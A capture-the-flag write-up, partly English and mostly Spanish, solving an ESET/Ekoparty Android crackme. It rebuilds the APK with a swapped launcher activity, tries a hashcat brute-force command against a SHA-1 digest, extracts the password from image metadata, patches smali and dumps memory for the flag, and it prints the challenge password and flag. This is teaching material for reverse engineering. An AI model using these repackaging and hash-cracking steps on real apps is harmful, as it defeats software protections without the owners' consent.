<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;">To launch that activity we edit </span><span style="color: #444444;">AndroidManifest.xml so that the MAIN/LAUNCHER intent-filter points at </span><span style="color: #444444;">SuperbActivity, then rebuild and re-sign the APK. Because the rebuilt package is signed with our own key, uninstall the original first: Android refuses to install a package over an existing one whose signing certificate differs.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88p_oybQoFfXNtfn5DgNW62KNtT3KlIgYuCwbo4dJ9PW9FEVVIpoy8nEkk7UFBSyJ_2HWWwBZpJ5TNCnHAyo1EEonyuKGdvkaT58450E0tQQCgosdykABWZQXTf_6wyLOy6r-jxxhVE/s1600/manifest-crack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88p_oybQoFfXNtfn5DgNW62KNtT3KlIgYuCwbo4dJ9PW9FEVVIpoy8nEkk7UFBSyJ_2HWWwBZpJ5TNCnHAyo1EEonyuKGdvkaT58450E0tQQCgosdykABWZQXTf_6wyLOy6r-jxxhVE/s640/manifest-crack.jpg" width="640" /></a></div>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">That gives us a second application that always starts the right activity for this challenge, so from here on we keep working with it.</span><br />
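<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The manifest edit is the only part of that procedure that is easy to get wrong by hand (the intent-filter has to move, not be copied, and the new launcher activity must be exported). The script below is an added example for this write-up, not part of the challenge or of APK Multi-Tool: it operates on a decoded AndroidManifest.xml as apktool writes it, moves the MAIN/LAUNCHER intent-filter from one activity to another and sets android:exported on the target. The manifest it ships with is constructed to mirror the two activities of the challenge; the package name and the fully-qualified activity names are assumptions.</span></div>

```python
"""Move the MAIN/LAUNCHER intent-filter between activities in a decoded
AndroidManifest.xml (apktool / APK Multi-Tool output).

Added example for this write-up; the embedded manifest is constructed and
its package/activity names are assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Keep the conventional "android:" prefix when serialising.
ET.register_namespace("android", ANDROID_NS)


def _a(attr: str) -> str:
    """Fully-qualified name of an android:* attribute for ElementTree."""
    return "{%s}%s" % (ANDROID_NS, attr)


def _is_launcher(intent_filter: ET.Element) -> bool:
    """True for an <intent-filter> that makes its activity the launcher."""
    actions = {e.get(_a("name")) for e in intent_filter.findall("action")}
    cats = {e.get(_a("name")) for e in intent_filter.findall("category")}
    return ("android.intent.action.MAIN" in actions
            and "android.intent.category.LAUNCHER" in cats)


def launcher_activity(manifest_xml: str):
    """Name of the activity that owns the MAIN/LAUNCHER filter, or None.
    Useful as a before/after check of the edit."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    for act in root.iter("activity"):
        if any(_is_launcher(f) for f in act.findall("intent-filter")):
            return act.get(_a("name"))
    return None


def swap_launcher(manifest_xml: str, old: str, new: str) -> str:
    """Return the manifest with the launcher filter moved from activity
    `old` to activity `new`. Fails loudly instead of silently producing a
    manifest with no launcher (a common hand-editing mistake)."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    activities = {act.get(_a("name")): act for act in root.iter("activity")}
    if old not in activities or new not in activities:
        raise ValueError("activity not found in manifest")
    src, dst = activities[old], activities[new]
    filters = [f for f in src.findall("intent-filter") if _is_launcher(f)]
    if not filters:
        raise ValueError("%s has no MAIN/LAUNCHER intent-filter" % old)
    for f in filters:
        src.remove(f)      # move, do not copy: two launchers = two icons
        dst.append(f)
    # The launcher must be reachable from outside the app; newer Android
    # releases refuse to start a non-exported activity from the Launcher.
    dst.set(_a("exported"), "true")
    return ET.tostring(root, encoding="unicode")


# Constructed manifest modelled on the challenge (names are assumptions).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.crackme">
  <application android:label="content">
    <activity android:name="com.example.crackme.SuperActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name="com.example.crackme.SuperbActivity"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    patched = swap_launcher(SAMPLE_MANIFEST,
                            "com.example.crackme.SuperActivity",
                            "com.example.crackme.SuperbActivity")
    print(launcher_activity(SAMPLE_MANIFEST), "->", launcher_activity(patched))
    print(patched)
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Write the returned string back over AndroidManifest.xml in the decoded tree, then rebuild and sign as described above. The before/after check matters because a manifest with no launcher activity builds and installs fine and only fails when you look for the icon.</span></div>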
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We launch it and see the following:</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVswDRzrUcwCqhhfGFfLsT0gvTiby0mvRUY5Ltvs_aacLRmrYb7xa0xv6rVQPh6kflxCkSX-NlWHNJmWN2wBgQb6uck1oDpPKPA3rYzU3lyfp3JkD5i0xhO5VDVrLQD6Tjl0OnvR05HA/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVswDRzrUcwCqhhfGFfLsT0gvTiby0mvRUY5Ltvs_aacLRmrYb7xa0xv6rVQPh6kflxCkSX-NlWHNJmWN2wBgQb6uck1oDpPKPA3rYzU3lyfp3JkD5i0xhO5VDVrLQD6Tjl0OnvR05HA/s400/06.jpg" width="257" /></a></div>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">An Fsociety image and a countdown timer; there is no input field of any kind, unlike the APK from Part 1.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>In the code we see</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><b><br /></b></span>
<br />
<br />
<pre style="color: #444444; font-family: 'Courier New', Courier, monospace; font-size: x-small;">
try
{
    // Retry timer: once it reaches zero, bump the attempt counter a and
    // derive the next delay (field c) from it.
    if ((SuperbActivity.b <= 0.0D) && (SuperbActivity.a < 0))
    {
        SuperbActivity.a += 1;
        SuperbActivity.access$002(SuperbActivity.this, 10.0D * (int)Math.log(Math.pow(SuperbActivity.a, SuperbActivity.a)));
        SuperbActivity.b = SuperbActivity.this.c;
        // Password gate: read "password" from SharedPreferences, SHA-1 it and
        // compare with a hard-coded digest; only then is d.decrypt() called.
        String str = SuperbActivity.this.getPreferences(4).getString("password", "no_password");
        if (e.<b>SHA1</b>(str).equalsIgnoreCase("<b>249192f0a4f70aa25aa5c7521625f7d6e4021042</b>"))
            new a().execute(new b[] { new b(SuperbActivity.this.getApplicationContext(), <b>d.decrypt(str, "Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=")</b>) });
    }
    SuperbActivity.this.t.setText(String.format("Próximo intento: %.1f", new Object[] { Double.valueOf(SuperbActivity.b) }));
    SuperbActivity.b -= 0.1D;
    SuperbActivity.this.g.postDelayed(this, 100L);   // re-run this Runnable every 100 ms
    return;
}
catch (Exception localException)
{
    <b>Log.e(SuperbActivity.this.getResources().getString(2131099668), "Oops!");</b>
}
</pre>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;">Two things stand out: the candidate password is run through <b>SHA1</b> and compared against a hard-coded digest, and on a match <b>d.decrypt</b> is called with that same password as its first argument and the string </span><b style="color: #444444;">Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=</b><span style="color: #444444;"> as its second.</span></span><br />
<b style="color: #444444; font-family: arial, helvetica, sans-serif; font-size: small;"><br /></b>
<b style="color: #444444; font-family: arial, helvetica, sans-serif; font-size: small;"><br /></b>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><b>We also see:</b></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<br />
<pre style="color: #444444; font-family: 'Courier New', Courier, monospace; font-size: x-small;">
protected void onCreate(Bundle paramBundle)
{
......................................
    // Decompiler artifact: the smali below shows the receiver here is a
    // SharedPreferences.Editor (local v0), not the Bundle parameter.
    paramBundle.putString("password", "<b>insert_password_here</b>");
    paramBundle.apply();
}
</pre>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;">Reviewing the smali code I see the following:</span></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">.source "SuperbActivity.java"</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> .line 61</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> .local v0, "editor":Landroid/content/SharedPreferences$Editor;</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-size: 13px;"></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> const-string v2, "password"</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="color: #444444;">Significa que existe una shared memory en la cual deberemos poner una clave para que luego sea comparada con el hash del SHA1 y si machea se ejecuta la función </span><b>d.decrypt("clave",</b></span></span><b style="font-family: Arial, Helvetica, sans-serif;">Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=)</b><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Busque el hash por internet sin suerte, por lo que intente con hashcat y probar una clave de 10 dígitos incremental....</span></span><br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">hashcat64.exe -m 100 -a 3 example0.hash ?s?s?s?s?s?s?s?s?s?s --incremental </span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Probé con solo numéricos, con alfa + may/minusculas sin éxito, para luego pasar al set con caracteres espaciales. Hasta los siete<span style="background-color: white; color: #444444;"> caracteres fue rápido y luego paso de horas a días y </span><span style="background-color: white; color: #444444;">años... por lo que descartamos esté método</span><span style="background-color: white; color: #444444;"> debido a que un reto en una confer no nos puede llevar tanto tiempo a menos que tengamos una maquina cuántica</span><span style="background-color: white; color: #444444;">...</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="background-color: white;"><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Probe con hashcat porque al ver a Obi se me vino a la mente "Usa la Fuerza"...fuerza bruta....mmmm.... no...no.... solo fue una trampita :D</span></span><br />
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">La password debería estar en otro lugar, revisando las imágenes de los recursos se las pase al exiftool y en la imagen de fsociety se puede ver lo siguiente en el </span></span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Thumbnail</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<span style="background-color: white;"><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">exiftool -b -ThumbnailImage image.jpg > my_thumbnail.jpg</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6vOw-A-YBVLtTr7g0wsbrEWqpePQadltW7R5tXPv__Dcqpt9NhDBHMqvxieiNeF5tA62SpUm4Nv8F00YH9CoERs3V3DukDiVtzUnGJYv_RF2pGbdqknLnxHLv8WjYH_W4PIlzPwFJdUc/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6vOw-A-YBVLtTr7g0wsbrEWqpePQadltW7R5tXPv__Dcqpt9NhDBHMqvxieiNeF5tA62SpUm4Nv8F00YH9CoERs3V3DukDiVtzUnGJYv_RF2pGbdqknLnxHLv8WjYH_W4PIlzPwFJdUc/s320/05.jpg" width="266" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ahora que tengo la password <b>r4bb!th0l3</b> se la puedo poner en el shared memory con el ADM en /data/data/eset.ekoparty.challenge.crackmeharder/shared_prefs/SuperbActivity.xml</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3WJ4IQrnUSciC1MOpnA3NRLdafIqI6xBopa0ordF_c1nYGygEYqVhi_XBeFcnFYmNRM6H1VUowLEBMu40ohyphenhyphenXSm8UysbtcM3ehsfsjrmXFoL2KXYkHWd6u5lxH56LbTBYyVazKLHUM-c/s1600/ADM.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3WJ4IQrnUSciC1MOpnA3NRLdafIqI6xBopa0ordF_c1nYGygEYqVhi_XBeFcnFYmNRM6H1VUowLEBMu40ohyphenhyphenXSm8UysbtcM3ehsfsjrmXFoL2KXYkHWd6u5lxH56LbTBYyVazKLHUM-c/s640/ADM.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLq6KTwd1S0Ait_jdrXXkfeQW4W2Uw0y4C56Ft2cJ7pmI8VOyyvadbmF0kY5UjN-QXpZhL_e2Q62CdBITw8paNOcy81Lcnhzo33BXF2aYNkIxw_-rPM9nF0RXqvJtb8ONnXDXc9OLfG1Q/s1600/recurso-password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLq6KTwd1S0Ait_jdrXXkfeQW4W2Uw0y4C56Ft2cJ7pmI8VOyyvadbmF0kY5UjN-QXpZhL_e2Q62CdBITw8paNOcy81Lcnhzo33BXF2aYNkIxw_-rPM9nF0RXqvJtb8ONnXDXc9OLfG1Q/s400/recurso-password.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">O asignar la password directamente en el SuperbActivity.smali</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> y me olvido.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Lógicamente vuelvo a compilar y firmar la aplicación.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">.source "SuperbActivity.java"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> .line 61</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> .local v0, "editor":Landroid/content/SharedPreferences$Editor;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> const-string v2, "password"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> const-string v3, "r4bb!th0l3"</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Cuando machea el SHA1, como habíamos comentado antes, se </span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">ejecuta </span><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><b>d.decrypt( </b></span></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>r4bb!th0l3,</b></span><b style="font-family: Arial, Helvetica, sans-serif;">Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=) </b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">obteniendo como resultado el string</span><b style="font-family: Arial, Helvetica, sans-serif;"> </b><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>f0ll0w_th3_wh!t3_r4bb!t!</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Acá la podemos ver en un dump de memoria previo.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ8biTlmpXuamo7BIxHUSgkVcf4IReOk1tp1GZzfJ_tpOdPRqeTUs1dhjq2KxffWlWbZ2CEaeEt4va5j93GlQz0JFTYkjUnDYCLHsnAnUQyzx644qo7KNOoJNM7Jtq32_5YjOelLn_-is/s1600/clave.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ8biTlmpXuamo7BIxHUSgkVcf4IReOk1tp1GZzfJ_tpOdPRqeTUs1dhjq2KxffWlWbZ2CEaeEt4va5j93GlQz0JFTYkjUnDYCLHsnAnUQyzx644qo7KNOoJNM7Jtq32_5YjOelLn_-is/s640/clave.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Cada vez que el contador se pone en cero o se da click en el label, el apk llama a la class b y visita un sitio.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> SuperbActivity.this.t.setText(String.format("Próximo intento: %.1f", new Object[] { Double.valueOf(SuperbActivity.b) }));</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> SuperbActivity.b -= 0.1D;</span></span><br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> SuperbActivity.this.g.postDelayed(this, 100L);</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">class b</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">{</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> .................................</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> String getUrl()</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> {</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> <b> return "http://desafioseset.com/";</b></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> }</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-size: 13px;"></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">}</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">En el LOGCAT se ve lo siguiente</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt1W1E8ExuWGOPlU2lL4UJmvCYvwsSem4qt8xQIPwIV8KgSh_bpXcpILGysm-LS8pz5sW35mcoTbMCOsJzmR2_KfZlDhDfCYtRp1HYduETZOw2I2PEirOPUdMi3ueBoD79rD7PcBPFMw/s1600/el+flag+esta+en+memoria.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt1W1E8ExuWGOPlU2lL4UJmvCYvwsSem4qt8xQIPwIV8KgSh_bpXcpILGysm-LS8pz5sW35mcoTbMCOsJzmR2_KfZlDhDfCYtRp1HYduETZOw2I2PEirOPUdMi3ueBoD79rD7PcBPFMw/s1600/el+flag+esta+en+memoria.jpg" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Por otro lado se llama a la Class n a la cual se le pasa el string </span><b style="font-family: Arial, Helvetica, sans-serif;">f0ll0w_th3_wh!t3_r4bb!t!</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"> SuperbActivity.FLAG = new n().func(localb.getKeyword());</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">class n</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">{</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> static</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> System.loadLibrary("dostuff");</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> }</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Por lo que si hacemos un DUMP de la memoria.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdryKk4DEII0NH_9A8zTLKmUtlh0hK4Yty52uc03pomYJ-CKom9WnBP0rui1Ahylkl0MOOQq1xrqmr_BjSFrqCkXd4J0Ohb3p0wrn4q4oHq-wKyFMLgquCw4S3ZQmJi56j2gFD2LHiPGI/s1600/dumpear.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdryKk4DEII0NH_9A8zTLKmUtlh0hK4Yty52uc03pomYJ-CKom9WnBP0rui1Ahylkl0MOOQq1xrqmr_BjSFrqCkXd4J0Ohb3p0wrn4q4oHq-wKyFMLgquCw4S3ZQmJi56j2gFD2LHiPGI/s400/dumpear.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Obtenemos la FLAG :D</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">eko_eset_m0b!l35</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ7Gc2wVz9K10M5OBgN669zQIzN8Bz_veC5UHHmwO7RWijXk7tFg-ECyKhIKYJYMPLuKJFLDywL8pCCeSmfT2XQhab-dSxihMJ_RexONkTs5_VRdaIEojtPU_CCjN3AqaX5aIX3rlQr5M/s1600/LA-FLAG.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ7Gc2wVz9K10M5OBgN669zQIzN8Bz_veC5UHHmwO7RWijXk7tFg-ECyKhIKYJYMPLuKJFLDywL8pCCeSmfT2XQhab-dSxihMJ_RexONkTs5_VRdaIEojtPU_CCjN3AqaX5aIX3rlQr5M/s640/LA-FLAG.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
